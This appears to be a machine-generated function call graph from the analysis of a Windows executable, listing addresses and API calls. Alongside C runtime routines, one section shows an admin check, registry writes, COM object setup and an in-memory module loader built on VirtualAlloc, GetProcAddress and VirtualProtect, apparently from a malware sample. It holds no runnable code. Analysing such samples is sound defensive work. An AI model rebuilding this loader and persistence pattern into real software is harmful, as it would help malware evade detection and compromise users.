11c0c94 _lock 62 API calls 17871->17873 17875 11bdbf0 17872->17875 17877 11be968 _amsg_exit 62 API calls 17872->17877 17878 11bdb81 17873->17878 17874 11bdbb7 18127 11c0b94 LeaveCriticalSection 17874->18127 17875->17844 17877->17875 17878->17874 17879 11bc600 free 62 API calls 17878->17879 17879->17874 17881 11be406 17880->17881 17882 11be3ca _errno _freefls 17880->17882 17884 11c0b94 LeaveCriticalSection 17881->17884 17882->17881 17885 11be240 17882->17885 17886 11be2d7 17885->17886 17888 11be25e 17885->17888 17887 11be32a 17886->17887 17889 11bc600 free 62 API calls 17886->17889 17900 11be357 17887->17900 17953 11c1978 17887->17953 17888->17886 17891 11be29d 17888->17891 17899 11bc600 free 62 API calls 17888->17899 17892 11be2fb 17889->17892 17893 11be2bf 17891->17893 17903 11bc600 free 62 API calls 17891->17903 17895 11bc600 free 62 API calls 17892->17895 17897 11bc600 free 62 API calls 17893->17897 17901 11be30f 17895->17901 17896 11be3a2 17904 11be2cb 17897->17904 17898 11bc600 free 62 API calls 17898->17900 17905 11be291 17899->17905 17900->17896 17906 11bc600 62 API calls free 17900->17906 17902 11bc600 free 62 API calls 17901->17902 17907 11be31e 17902->17907 17908 11be2b3 17903->17908 17909 11bc600 free 62 API calls 17904->17909 17913 11c1dd4 17905->17913 17906->17900 17911 11bc600 free 62 API calls 17907->17911 17941 11c1d68 17908->17941 17909->17886 17911->17887 17914 11c1ddd 17913->17914 17939 11c1ed8 17913->17939 17915 11c1df7 17914->17915 17917 11bc600 free 62 API calls 17914->17917 17916 11c1e09 17915->17916 17918 11bc600 free 62 API calls 17915->17918 17919 11c1e1b 17916->17919 17920 11bc600 free 62 API calls 17916->17920 17917->17915 17918->17916 17921 11c1e2d 17919->17921 17922 11bc600 free 62 API calls 17919->17922 17920->17919 17923 11c1e3f 17921->17923 17924 11bc600 free 62 API calls 17921->17924 17922->17921 17925 11c1e51 17923->17925 17927 11bc600 free 62 API calls 17923->17927 17924->17923 17926 11c1e63 17925->17926 17928 11bc600 free 62 API calls 17925->17928 17929 11c1e75 17926->17929 17930 11bc600 free 62 API calls 17926->17930 17927->17925 17928->17926 17931 11c1e87 17929->17931 17932 11bc600 free 62 API calls 17929->17932 17930->17929 17933 11c1e99 17931->17933 17934 11bc600 free 62 API calls 17931->17934 17932->17931 17935 11c1eae 17933->17935 17936 11bc600 free 62 API calls 17933->17936 17934->17933 17937 11c1ec3 17935->17937 17938 11bc600 free 62 API calls 17935->17938 17936->17935 17937->17939 17940 11bc600 free 62 API calls 17937->17940 17938->17937 17939->17891 17940->17939 17942 11c1d6d 17941->17942 17943 11c1dce 17941->17943 17944 11c1d86 17942->17944 17945 11bc600 free 62 API calls 17942->17945 17943->17893 17946 11c1d98 17944->17946 17947 11bc600 free 62 API calls 17944->17947 17945->17944 17948 11c1daa 17946->17948 17949 11bc600 free 62 API calls 17946->17949 17947->17946 17950 11c1dbc 17948->17950 17951 11bc600 free 62 API calls 17948->17951 17949->17948 17950->17943 17952 11bc600 free 62 API calls 17950->17952 17951->17950 17952->17943 17954 11c1981 17953->17954 18126 11be34b 17953->18126 17955 11bc600 free 62 API calls 17954->17955 17956 11c1992 17955->17956 17957 11bc600 free 62 API calls 17956->17957 17958 11c199b 17957->17958 17959 11bc600 free 62 API calls 17958->17959 17960 11c19a4 17959->17960 17961 11bc600 free 62 API calls 17960->17961 17962 11c19ad 17961->17962 17963 11bc600 free 62 API calls 17962->17963 17964 11c19b6 17963->17964 17965 11bc600 free 62 API calls 17964->17965 17966 11c19bf 17965->17966 17967 11bc600 free 62 API calls 17966->17967 17968 11c19c7 17967->17968 17969 11bc600 free 62 API calls 17968->17969 17970 11c19d0 17969->17970 17971 11bc600 free 62 API calls 17970->17971 17972 11c19d9 17971->17972 17973 11bc600 free 62 API calls 17972->17973 17974 11c19e2 17973->17974 17975 11bc600 free 62 API calls 17974->17975 17976 11c19eb 17975->17976 17977 11bc600 free 62 API calls 17976->17977 17978 11c19f4 17977->17978 17979 11bc600 free 62 API calls 17978->17979 17980 11c19fd 17979->17980 17981 11bc600 free 62 API calls 17980->17981 17982 11c1a06 17981->17982 17983 11bc600 free 62 API calls 17982->17983 17984 11c1a0f 17983->17984 17985 11bc600 free 62 API calls 17984->17985 17986 11c1a18 17985->17986 17987 11bc600 free 62 API calls 17986->17987 17988 11c1a24 17987->17988 17989 11bc600 free 62 API calls 17988->17989 17990 11c1a30 17989->17990 17991 11bc600 free 62 API calls 17990->17991 17992 11c1a3c 17991->17992 17993 11bc600 free 62 API calls 17992->17993 17994 11c1a48 17993->17994 17995 11bc600 free 62 API calls 17994->17995 17996 11c1a54 17995->17996 17997 11bc600 free 62 API calls 17996->17997 17998 11c1a60 17997->17998 17999 11bc600 free 62 API calls 17998->17999 18000 11c1a6c 17999->18000 18001 11bc600 free 62 API calls 18000->18001 18002 11c1a78 18001->18002 18003 11bc600 free 62 API calls 18002->18003 18004 11c1a84 18003->18004 18005 11bc600 free 62 API calls 18004->18005 18006 11c1a90 18005->18006 18007 11bc600 free 62 API calls 18006->18007 18008 11c1a9c 18007->18008 18009 11bc600 free 62 API calls 18008->18009 18010 11c1aa8 18009->18010 18011 11bc600 free 62 API calls 18010->18011 18012 11c1ab4 18011->18012 18013 11bc600 free 62 API calls 18012->18013 18014 11c1ac0 18013->18014 18015 11bc600 free 62 API calls 18014->18015 18016 11c1acc 18015->18016 18017 11bc600 free 62 API calls 18016->18017 18018 11c1ad8 18017->18018 18019 11bc600 free 62 API calls 18018->18019 18020 11c1ae4 18019->18020 18021 11bc600 free 62 API calls 18020->18021 18022 11c1af0 18021->18022 18023 11bc600 free 62 API calls 18022->18023 18024 11c1afc 18023->18024 18025 11bc600 free 62 API calls 18024->18025 18026 11c1b08 18025->18026 18027 11bc600 free 62 API calls 18026->18027 18028 11c1b14 18027->18028 18029 11bc600 free 62 API calls 18028->18029 18030 11c1b20 18029->18030 18031 11bc600 free 62 API calls 18030->18031 18032 11c1b2c 18031->18032 18033 11bc600 free 62 API calls 18032->18033 18034 11c1b38 18033->18034 18035 11bc600 free 62 API calls 18034->18035 18036 11c1b44 18035->18036 18037 11bc600 free 62 API calls 18036->18037 18038 11c1b50 18037->18038 18039 11bc600 free 62 API calls 18038->18039 18040 11c1b5c 18039->18040 18041 11bc600 free 62 API calls 18040->18041 18042 11c1b68 18041->18042 18043 11bc600 free 62 API calls 18042->18043 18044 11c1b74 18043->18044 18045 11bc600 free 62 API calls 18044->18045 18046 11c1b80 18045->18046 18047 11bc600 free 62 API calls 18046->18047 18048 11c1b8c 18047->18048 18049 11bc600 free 62 API calls 18048->18049 18050 11c1b98 18049->18050 18051 11bc600 free 62 API calls 18050->18051 18052 11c1ba4 18051->18052 18053 11bc600 free 62 API calls 18052->18053 18054 11c1bb0 18053->18054 18055 11bc600 free 62 API calls 18054->18055 18056 11c1bbc 18055->18056 18057 11bc600 free 62 API calls 18056->18057 18058 11c1bc8 18057->18058 18059 11bc600 free 62 API calls 18058->18059 18060 11c1bd4 18059->18060 18061 11bc600 free 62 API calls 18060->18061 18062 11c1be0 18061->18062 18063 11bc600 free 62 API calls 18062->18063 18064 11c1bec 18063->18064 18065 11bc600 free 62 API calls 18064->18065 18066 11c1bf8 18065->18066 18067 11bc600 free 62 API calls 18066->18067 18068 11c1c04 18067->18068 18069 11bc600 free 62 API calls 18068->18069 18070 11c1c10 18069->18070 18071 11bc600 free 62 API calls 18070->18071 18072 11c1c1c 18071->18072 18073 11bc600 free 62 API calls 18072->18073 18074 11c1c28 18073->18074 18075 11bc600 free 62 API calls 18074->18075 18076 11c1c34 18075->18076 18077 11bc600 free 62 API calls 18076->18077 18078 11c1c40 18077->18078 18079 11bc600 free 62 API calls 18078->18079 18080 11c1c4c 18079->18080 18081 11bc600 free 62 API calls 18080->18081 18082 11c1c58 18081->18082 18083 11bc600 free 62 API calls 18082->18083 18084 11c1c64 18083->18084 18085 11bc600 free 62 API calls 18084->18085 18086 11c1c70 18085->18086 18087 11bc600 free 62 API calls 18086->18087 18088 11c1c7c 18087->18088 18089 11bc600 free 62 API calls 18088->18089 18090 11c1c88 18089->18090 18091 11bc600 free 62 API calls 18090->18091 18092 11c1c94 18091->18092 18093 11bc600 free 62 API calls 18092->18093 18094 11c1ca0 18093->18094 18095 11bc600 free 62 API calls 18094->18095 18096 11c1cac 18095->18096 18097 11bc600 free 62 API calls 18096->18097 18098 11c1cb8 18097->18098 18099 11bc600 free 62 API calls 18098->18099 18100 11c1cc4 18099->18100 18101 11bc600 free 62 API calls 18100->18101 18102 11c1cd0 18101->18102 18103 11bc600 free 62 API calls 18102->18103 18104 11c1cdc 18103->18104 18105 11bc600 free 62 API calls 18104->18105 18106 11c1ce8 18105->18106 18107 11bc600 free 62 API calls 18106->18107 18108 11c1cf4 18107->18108 18109 11bc600 free 62 API calls 18108->18109 18110 11c1d00 18109->18110 18111 11bc600 free 62 API calls 18110->18111 18112 11c1d0c 18111->18112 18113 11bc600 free 62 API calls 18112->18113 18114 11c1d18 18113->18114 18115 11bc600 free 62 API calls 18114->18115 18116 11c1d24 18115->18116 18117 11bc600 free 62 API calls 18116->18117 18118 11c1d30 18117->18118 18119 11bc600 free 62 API calls 18118->18119 18120 11c1d3c 18119->18120 18121 11bc600 free 62 API calls 18120->18121 18122 11c1d48 18121->18122 18123 11bc600 free 62 API calls 18122->18123 18124 11c1d54 18123->18124 18125 11bc600 free 62 API calls 18124->18125 18125->18126 18126->17898 18129 11b9a86 18128->18129 18130 11c0475 18128->18130 18129->17821 18129->17822 18131 11baa70 _errno 62 API calls 18130->18131 18132 11c047a 18131->18132 18133 11baa08 _invalid_parameter_noinfo 17 API calls 18132->18133 18133->18129 18135 11c0201 18134->18135 18137 11c020e 18134->18137 18136 11baa70 _errno 62 API calls 18135->18136 18138 11c0206 18136->18138 18137->18138 18139 11baa70 _errno 62 API calls 18137->18139 18138->17836 18140 11c0245 18139->18140 18141 11baa08 _invalid_parameter_noinfo 17 API calls 18140->18141 18141->18138 18143 11c06cc __setargv 62 API calls 18142->18143 18144 11c01bd 18143->18144 18144->17827 18146 11c00ff 18145->18146 18147 11c00e7 18145->18147 18148 11c0176 18146->18148 18153 11c0131 18146->18153 18193 11baa90 18147->18193 18150 11baa90 __doserrno 62 API calls 18148->18150 18152 11c017b 18150->18152 18155 11baa70 _errno 62 API calls 18152->18155 18196 11c28b8 18153->18196 18154 11baa70 _errno 62 API calls 18157 11c00f4 18154->18157 18158 11c0183 18155->18158 18157->17826 18160 11baa08 _invalid_parameter_noinfo 17 API calls 18158->18160 18160->18157 18161 11c0144 18206 11bf964 18161->18206 18162 11c0155 18164 11baa70 _errno 62 API calls 18162->18164 18166 11c015a 18164->18166 18165 11c0151 18258 11c2960 LeaveCriticalSection 18165->18258 18167 11baa90 __doserrno 62 API calls 18166->18167 18167->18165 18170 11bf8a3 18169->18170 18171 11bf8bb 18169->18171 18173 11baa90 __doserrno 62 API calls 18170->18173 18172 11bf935 18171->18172 18176 11bf8ed 18171->18176 18174 11baa90 __doserrno 62 API calls 18172->18174 18175 11bf8a8 18173->18175 18177 11bf93a 18174->18177 18178 11baa70 _errno 62 API calls 18175->18178 18179 11c28b8 _flush 64 API calls 18176->18179 18180 11baa70 _errno 62 API calls 18177->18180 18192 11bf8b0 18178->18192 18181 11bf8f4 18179->18181 18182 11bf942 18180->18182 18183 11bf912 18181->18183 18184 11bf900 18181->18184 18185 11baa08 _invalid_parameter_noinfo 17 API calls 18182->18185 18187 11baa70 _errno 62 API calls 18183->18187 18186 11bf7e8 _flush 64 API calls 18184->18186 18185->18192 18188 11bf90d 18186->18188 18189 11bf917 18187->18189 18290 11c2960 LeaveCriticalSection 18188->18290 18190 11baa90 __doserrno 62 API calls 18189->18190 18190->18188 18192->17826 18194 11bad14 _errno 62 API calls 18193->18194 18195 11baa99 18194->18195 18195->18154 18197 11c292d 18196->18197 18198 11c28f9 18196->18198 18199 11c0138 18197->18199 18200 11c2931 EnterCriticalSection 18197->18200 18201 11c0c94 _lock 62 API calls 18198->18201 18199->18161 18199->18162 18200->18199 18202 11c2901 18201->18202 18203 11c2909 InitializeCriticalSectionAndSpinCount 18202->18203 18204 11c2923 18202->18204 18203->18204 18259 11c0b94 LeaveCriticalSection 18204->18259 18208 11bf986 _flush 18206->18208 18207 11bf9ba 18209 11baa90 __doserrno 62 API calls 18207->18209 18208->18207 18211 11bfa20 18208->18211 18245 11bf9ae 18208->18245 18212 11bf9bf 18209->18212 18210 11bc5e0 _cftoe_l 8 API calls 18213 11c00a9 18210->18213 18214 11bfa35 18211->18214 18260 11bf7e8 18211->18260 18215 11baa70 _errno 62 API calls 18212->18215 18213->18165 18217 11c01f8 _isatty 62 API calls 18214->18217 18218 11bf9c6 18215->18218 18219 11bfa3c 18217->18219 18220 11baa08 _invalid_parameter_noinfo 17 API calls 18218->18220 18221 11bfd0e 18219->18221 18224 11bad98 _getptd 62 API calls 18219->18224 18220->18245 18222 11bfd25 18221->18222 18223 11c0023 WriteFile 18221->18223 18225 11bfdfe 18222->18225 18233 11bfd33 18222->18233 18226 11bfcf8 GetLastError 18223->18226 18238 11bfcce 18223->18238 18227 11bfa60 GetConsoleMode 18224->18227 18237 11bfe08 18225->18237 18252 11bfee0 18225->18252 18226->18238 18227->18221 18229 11bfa91 18227->18229 18228 11c0059 18230 11baa70 _errno 62 API calls 18228->18230 18228->18245 18229->18221 18232 11bfa9e GetConsoleCP 18229->18232 18234 11c0081 18230->18234 18231 11bfffd 18235 11c004d 18231->18235 18236 11c0002 18231->18236 18232->18238 18256 11bfab8 _flush 18232->18256 18233->18228 18233->18238 18239 11bfd7f WriteFile 18233->18239 18240 11baa90 __doserrno 62 API calls 18234->18240 18273 11baab0 18235->18273 18242 11baa70 _errno 62 API calls 18236->18242 18237->18228 18237->18238 18243 11bfe61 WriteFile 18237->18243 18238->18228 18238->18231 18238->18245 18239->18226 18239->18233 18240->18245 18241 11bff30 WideCharToMultiByte 18247 11c0019 GetLastError 18241->18247 18241->18252 18246 11c0007 18242->18246 18243->18226 18243->18237 18245->18210 18248 11baa90 __doserrno 62 API calls 18246->18248 18247->18238 18248->18245 18250 11bff80 WriteFile 18251 11bffca GetLastError 18250->18251 18250->18252 18251->18252 18252->18228 18252->18238 18252->18241 18252->18250 18253 11c2988 WriteConsoleW CreateFileW _flush 18253->18256 18254 11bfb5e WideCharToMultiByte 18254->18238 18255 11bfba1 WriteFile 18254->18255 18255->18226 18255->18256 18256->18226 18256->18238 18256->18253 18256->18254 18257 11bfbfa WriteFile 18256->18257 18270 11c0a38 18256->18270 18257->18226 18257->18256 18278 11c2844 18260->18278 18263 11bf81b SetFilePointer 18266 11bf839 GetLastError 18263->18266 18267 11bf80f 18263->18267 18264 11bf80a 18265 11baa70 _errno 62 API calls 18264->18265 18265->18267 18266->18267 18268 11bf843 18266->18268 18267->18214 18269 11baab0 _close_nolock 62 API calls 18268->18269 18269->18267 18271 11b951c _cftof_l 62 API calls 18270->18271 18272 11c0a4c 18271->18272 18272->18256 18274 11bad14 _errno 62 API calls 18273->18274 18275 11baabd 18274->18275 18276 11bad14 _errno 62 API calls 18275->18276 18277 11baad6 realloc 18276->18277 18277->18245 18279 11c284d 18278->18279 18280 11c2862 18278->18280 18281 11baa90 __doserrno 62 API calls 18279->18281 18282 11baa90 __doserrno 62 API calls 18280->18282 18285 11bf804 18280->18285 18283 11c2852 18281->18283 18286 11c289c 18282->18286 18284 11baa70 _errno 62 API calls 18283->18284 18284->18285 18285->18263 18285->18264 18287 11baa70 _errno 62 API calls 18286->18287 18288 11c28a4 18287->18288 18289 11baa08 _invalid_parameter_noinfo 17 API calls 18288->18289 18289->18285 18298 11b23b6 18299 11b23d0 18298->18299 18300 11b24bc 18299->18300 18366 11adef0 AllocateAndInitializeSid 18299->18366 18301 11b24ca 18300->18301 18449 119f200 18300->18449 18305 11b24d8 18301->18305 18306 11b24d3 18301->18306 18307 11b24e1 18305->18307 18308 11b24e6 18305->18308 18462 119ee80 LocalAlloc 18306->18462 18497 11ac1a0 CreateThread 18307->18497 18330 11a6800 18308->18330 18311 119f510 96 API calls 18313 11b2416 18311->18313 18313->18300 18315 11b242d 18313->18315 18318 11b84a8 89 API calls 18315->18318 18316 11b24f9 CreateEventW 18317 11b2562 WSAStartup 18316->18317 18319 11b251d CreateThread 18316->18319 18320 11b25e0 18317->18320 18321 11b2575 18317->18321 18322 11b2478 18318->18322 18323 11b2553 18319->18323 18324 11b2555 CloseHandle 18319->18324 18325 11b25aa CreateThread 18321->18325 18326 11b257e CreateThread 18321->18326 18371 1197ef0 18322->18371 18323->18317 18324->18317 18325->18320 18328 11b25e7 WSACleanup 18325->18328 18775 11b5e50 OpenEventW 18325->18775 18326->18325 18328->18320 18331 11a6817 18330->18331 18332 11a681c 18331->18332 18499 119f790 SHGetKnownFolderPath 18331->18499 18332->18316 18332->18317 18337 11a6d51 LocalFree 18337->18332 18338 11a6876 LocalAlloc 18339 11a6d2b 18338->18339 18340 11a6897 lstrcpyW StrStrIW CreateFileW 18338->18340 18341 11a6d3e 18339->18341 18342 11a6d33 LocalFree 18339->18342 18343 11a690a GetFileSize 18340->18343 18344 11a6d20 LocalFree 18340->18344 18341->18337 18345 11a6d46 LocalFree 18341->18345 18342->18341 18346 11a6d0d 18343->18346 18347 11a6926 LocalAlloc 18343->18347 18344->18339 18345->18337 18346->18344 18348 11a6d15 CloseHandle 18346->18348 18347->18346 18349 11a6948 ReadFile 18347->18349 18348->18344 18350 11a697f CloseHandle 18349->18350 18351 11a6d02 LocalFree 18349->18351 18352 11a69e6 18350->18352 18351->18346 18575 11b0e30 18352->18575 18354 11a6a5a 18354->18351 18355 11a6a99 LocalAlloc 18354->18355 18360 11a6cad 18354->18360 18356 11a6ac0 LocalAlloc 18355->18356 18355->18360 18357 11a6c9f LocalFree 18356->18357 18358 11a6ae7 wmemmove 18356->18358 18357->18360 18359 11a6b01 lstrcpyW lstrcpyW lstrcpyW 18358->18359 18363 11a6bae 18359->18363 18360->18351 18361 11a6cec VirtualFree 18360->18361 18361->18351 18362 11a6c91 LocalFree 18362->18357 18363->18362 18364 11a6c08 LocalFree LocalFree LocalFree LocalFree 18363->18364 18364->18332 18367 11adf9c 18366->18367 18368 11adf73 CheckTokenMembership 18366->18368 18367->18300 18367->18311 18369 11adf89 18368->18369 18370 11adf91 FreeSid 18368->18370 18369->18370 18370->18367 18602 11a7e10 18371->18602 18373 1197f77 18374 11a7e10 5 API calls 18373->18374 18375 1197fd5 CoInitializeEx 18374->18375 18376 1198018 CoInitializeSecurity 18375->18376 18377 1198011 LocalFree 18375->18377 18378 119806b CoCreateInstance 18376->18378 18379 1198066 CoUninitialize 18376->18379 18377->18300 18378->18379 18381 11980aa 18378->18381 18379->18377 18610 11a3320 VariantInit 18381->18610 18383 11980b7 18611 11a3320 VariantInit 18383->18611 18385 1198130 18612 11a3320 VariantInit 18385->18612 18387 11981a9 18613 11a3320 VariantInit 18387->18613 18389 1198222 18614 11a33a0 VariantClear 18389->18614 18391 11982dd 18615 11a33a0 VariantClear 18391->18615 18393 11982eb 18616 11a33a0 VariantClear 18393->18616 18395 11982f9 18617 11a33a0 VariantClear 18395->18617 18397 1198307 18398 1198311 CoUninitialize 18397->18398 18618 11a3040 18397->18618 18398->18377 18401 119832a 18623 11a30d0 18401->18623 18404 11983a3 18405 11a3040 74 API calls 18404->18405 18406 11983b8 18405->18406 18407 11a30d0 SysFreeString 18406->18407 18408 1198417 18407->18408 18409 119845b CoUninitialize 18408->18409 18413 119847e 18408->18413 18409->18377 18411 11984ad CoUninitialize 18411->18377 18413->18411 18414 11a3040 74 API calls 18413->18414 18415 1198574 18414->18415 18416 11a30d0 SysFreeString 18415->18416 18417 11985d3 18416->18417 18417->18411 18418 11986e9 CoCreateGuid 18417->18418 18419 1198728 StringFromGUID2 18418->18419 18420 1198741 18418->18420 18419->18420 18421 11a3040 74 API calls 18420->18421 18422 1198756 18421->18422 18423 11a30d0 SysFreeString 18422->18423 18424 11987b8 18423->18424 18424->18411 18425 11b84a8 89 API calls 18424->18425 18426 11987e8 18425->18426 18426->18411 18427 11a3040 74 API calls 18426->18427 18428 1198878 18427->18428 18429 11a30d0 SysFreeString 18428->18429 18430 11988dd 18429->18430 18430->18411 18626 11a3340 SysAllocString 18430->18626 18432 1198b56 18628 11a3320 VariantInit 18432->18628 18434 1198bcf 18435 11a3340 SysAllocString 18434->18435 18436 1198c50 18435->18436 18437 11a3040 74 API calls 18436->18437 18438 1198cd1 18437->18438 18439 11a30d0 SysFreeString 18438->18439 18440 1198d7d 18439->18440 18629 11a33a0 VariantClear 18440->18629 18442 1198d8b 18630 11a33a0 VariantClear 18442->18630 18444 1198d99 18631 11a33a0 VariantClear 18444->18631 18446 1198da7 18446->18411 18447 1198db6 CoUninitialize 18446->18447 18447->18377 18450 119f510 96 API calls 18449->18450 18451 119f215 18450->18451 18452 119f35f 18451->18452 18453 119f226 LocalAlloc 18451->18453 18452->18301 18454 119f354 LocalFree 18453->18454 18455 119f247 wnsprintfW 18453->18455 18454->18452 18456 119f288 RegOpenKeyW 18455->18456 18457 119f2e4 18455->18457 18456->18457 18458 119f2a5 RegSetValueExW RegCloseKey 18456->18458 18459 119f349 LocalFree 18457->18459 18460 119f2ed RegOpenKeyW 18457->18460 18458->18457 18459->18454 18460->18459 18461 119f30a RegSetValueExW RegCloseKey 18460->18461 18461->18459 18463 119eea8 SHGetKnownFolderPath 18462->18463 18466 119f1e1 18462->18466 18464 119eec7 18463->18464 18465 119f1d6 LocalFree 18463->18465 18467 11b84a8 89 API calls 18464->18467 18465->18466 18466->18305 18468 119eeee 18467->18468 18469 119f510 96 API calls 18468->18469 18470 119eeff 18469->18470 18471 119f1cb CoTaskMemFree 18470->18471 18472 119ef10 LocalAlloc 18470->18472 18471->18465 18473 119ef31 18472->18473 18474 119f1c0 LocalFree 18472->18474 18726 11b9430 18473->18726 18474->18471 18477 119f1b5 LocalFree 18477->18474 18478 119ef87 LocalAlloc 18479 119efa8 18478->18479 18480 119f1aa CoTaskMemFree 18478->18480 18481 11b84a8 89 API calls 18479->18481 18480->18477 18482 119efcf CreateDirectoryW 18481->18482 18483 119efed GetLastError 18482->18483 18484 119effe LocalAlloc 18482->18484 18483->18484 18485 119f19f LocalFree 18483->18485 18484->18485 18486 119f025 18484->18486 18485->18480 18487 11b84a8 89 API calls 18486->18487 18488 119f05b CreateFileW 18487->18488 18489 119f191 LocalFree 18488->18489 18490 119f0b0 WriteFile 18488->18490 18489->18485 18491 119f178 18490->18491 18492 119f0f5 CloseHandle 18490->18492 18491->18489 18493 119f183 CloseHandle 18491->18493 18737 11ae650 CoInitialize 18492->18737 18493->18489 18496 119f12c 6 API calls 18496->18466 18498 11ac1dd 18497->18498 18498->18308 18500 119f7b9 LocalAlloc 18499->18500 18503 119f835 18499->18503 18501 119f82a CoTaskMemFree 18500->18501 18502 119f7d6 wnsprintfW 18500->18502 18501->18503 18502->18501 18504 119f806 lstrlenW CoTaskMemFree 18502->18504 18503->18332 18505 11a5aa0 18503->18505 18504->18503 18506 119f790 6 API calls 18505->18506 18507 11a5ac3 18506->18507 18508 11a6513 18507->18508 18509 11a5ad4 LocalAlloc 18507->18509 18508->18337 18508->18338 18510 11a6508 LocalFree 18509->18510 18511 11a5af5 LocalAlloc 18509->18511 18510->18508 18512 11a64fd LocalFree 18511->18512 18513 11a5b16 18511->18513 18512->18510 18514 11a5b68 18513->18514 18515 11a5b1d wnsprintfW wnsprintfW 18513->18515 18517 11a5bba 18514->18517 18518 11a5b6f wnsprintfW wnsprintfW 18514->18518 18516 11a64d1 LocalFree 18515->18516 18516->18508 18519 11a5c0c 18517->18519 18520 11a5bc1 wnsprintfW wnsprintfW 18517->18520 18518->18516 18521 11a5c5e 18519->18521 18522 11a5c13 wnsprintfW wnsprintfW 18519->18522 18520->18516 18523 11a5cb0 18521->18523 18524 11a5c65 wnsprintfW wnsprintfW 18521->18524 18522->18516 18525 11a5d02 18523->18525 18526 11a5cb7 wnsprintfW wnsprintfW 18523->18526 18524->18516 18527 11a5d09 wnsprintfW wnsprintfW 18525->18527 18528 11a5d54 18525->18528 18526->18516 18527->18516 18529 11a5d5b wnsprintfW wnsprintfW 18528->18529 18530 11a5da6 18528->18530 18529->18516 18531 11a5df8 18530->18531 18532 11a5dad wnsprintfW wnsprintfW 18530->18532 18533 11a5e4a 18531->18533 18534 11a5dff wnsprintfW wnsprintfW 18531->18534 18532->18516 18535 11a5e9c 18533->18535 18536 11a5e51 wnsprintfW wnsprintfW 18533->18536 18534->18516 18537 11a5eee 18535->18537 18538 11a5ea3 wnsprintfW wnsprintfW 18535->18538 18536->18516 18539 11a5f40 18537->18539 18540 11a5ef5 wnsprintfW wnsprintfW 18537->18540 18538->18516 18541 11a5f92 18539->18541 18542 11a5f47 wnsprintfW wnsprintfW 18539->18542 18540->18516 18543 11a5f99 wnsprintfW wnsprintfW 18541->18543 18544 11a5fe4 18541->18544 18542->18516 18543->18516 18545 11a5feb wnsprintfW wnsprintfW 18544->18545 18546 11a6036 18544->18546 18545->18516 18547 11a6088 18546->18547 18548 11a603d wnsprintfW wnsprintfW 18546->18548 18549 11a60da 18547->18549 18550 11a608f wnsprintfW wnsprintfW 18547->18550 18548->18516 18551 11a612c 18549->18551 18552 11a60e1 wnsprintfW wnsprintfW 18549->18552 18550->18516 18553 11a617e 18551->18553 18554 11a6133 wnsprintfW wnsprintfW 18551->18554 18552->18516 18555 11a61d0 18553->18555 18556 11a6185 wnsprintfW wnsprintfW 18553->18556 18554->18516 18557 11a6222 18555->18557 18558 11a61d7 wnsprintfW wnsprintfW 18555->18558 18556->18516 18559 11a6229 wnsprintfW wnsprintfW 18557->18559 18560 11a6274 18557->18560 18558->18516 18559->18516 18561 11a627b wnsprintfW wnsprintfW 18560->18561 18562 11a62c6 18560->18562 18561->18516 18563 11a6318 18562->18563 18564 11a62cd wnsprintfW wnsprintfW 18562->18564 18565 11a636a 18563->18565 18566 11a631f wnsprintfW wnsprintfW 18563->18566 18564->18516 18567 11a63bc 18565->18567 18568 11a6371 wnsprintfW wnsprintfW 18565->18568 18566->18516 18569 11a640e 18567->18569 18570 11a63c3 wnsprintfW wnsprintfW 18567->18570 18568->18516 18571 11a645d 18569->18571 18572 11a6415 wnsprintfW wnsprintfW 18569->18572 18570->18516 18573 11a64ac LocalFree LocalFree LocalFree 18571->18573 18574 11a6464 wnsprintfW wnsprintfW 18571->18574 18572->18516 18573->18508 18574->18516 18586 11b0ac0 LocalAlloc 18575->18586 18577 11b1228 18577->18354 18578 11b1215 VirtualFree 18578->18577 18579 11b11bb 18594 11b0670 LocalAlloc 18579->18594 18580 11b101a LoadLibraryA 18581 11b0ea9 18580->18581 18583 11b0eb6 18580->18583 18581->18579 18581->18580 18581->18583 18584 11b10ba GetProcAddress 18581->18584 18585 11b1117 GetProcAddress 18581->18585 18583->18577 18583->18578 18584->18581 18584->18583 18585->18581 18585->18583 18587 11b0b45 18586->18587 18588 11b0b4c und_memcpy 18586->18588 18587->18581 18589 11b0b8a VirtualAlloc 18588->18589 18590 11b0bc2 LocalFree 18589->18590 18591 11b0bd7 und_memcpy 18589->18591 18590->18587 18592 11b0e05 LocalFree 18591->18592 18593 11b0cf3 und_memcpy 18591->18593 18592->18587 18593->18581 18595 11b06d8 18594->18595 18599 11b06df und_memcpy 18594->18599 18595->18583 18596 11b0a78 LocalFree 18596->18595 18597 11b09bf 18596->18597 18597->18595 18598 11b0a98 LocalFree 18597->18598 18598->18595 18599->18596 18600 11b098c VirtualProtect 18599->18600 18600->18597 18601 11b09c9 18600->18601 18601->18596 18603 11a7f38 18602->18603 18604 11a7e3d 18602->18604 18607 11a7fc0 LocalAlloc 18603->18607 18609 11a7e73 _snprintf wmemmove 18603->18609 18605 11a7eb9 lstrlenW LocalAlloc 18604->18605 18606 11a7e47 lstrlenW 18604->18606 18608 11a7f0e lstrcpyW 18605->18608 18605->18609 18606->18609 18607->18609 18608->18609 18609->18373 18610->18383 18611->18385 18612->18387 18613->18389 18614->18391 18615->18393 18616->18395 18617->18397 18632 11a3290 18618->18632 18622 11a307d 18622->18401 18709 11a3130 18623->18709 18627 11a337b 18626->18627 18627->18432 18628->18434 18629->18442 18630->18444 18631->18446 18637 11b9030 18632->18637 18635 11a3170 SysAllocString 18636 11a31b5 18635->18636 18636->18622 18639 11b903b 18637->18639 18638 11bc7a8 malloc 62 API calls 18638->18639 18639->18638 18640 11a3061 18639->18640 18641 11bc868 _callnewh DecodePointer 18639->18641 18644 11b905a _DebugMallocator 18639->18644 18640->18622 18640->18635 18641->18639 18642 11b90ab 18654 11b92a4 18642->18654 18644->18642 18651 11bc790 18644->18651 18648 11b90d2 18660 11bc89c 18648->18660 18669 11bc684 18651->18669 18683 11b9214 18654->18683 18657 11b8f9c 18658 11b8fca wmemmove 18657->18658 18659 11b9009 RaiseException 18658->18659 18659->18648 18661 11c0c94 _lock 62 API calls 18660->18661 18662 11bc8af 18661->18662 18665 11bc8e3 18662->18665 18667 11bc600 free 62 API calls 18662->18667 18668 11bc8f3 18662->18668 18666 11bc600 free 62 API calls 18665->18666 18666->18668 18667->18665 18708 11c0b94 LeaveCriticalSection 18668->18708 18682 11be624 18669->18682 18684 11b90bc 18683->18684 18685 11b9229 18683->18685 18684->18657 18689 11b91bc 18685->18689 18690 11b91cb 18689->18690 18691 11b91d4 18689->18691 18692 11bc600 free 62 API calls 18690->18692 18691->18684 18693 11b9160 18691->18693 18692->18691 18694 11b9165 std::exception::operator= 18693->18694 18698 11b91a6 18693->18698 18695 11bc7a8 malloc 62 API calls 18694->18695 18696 11b918e 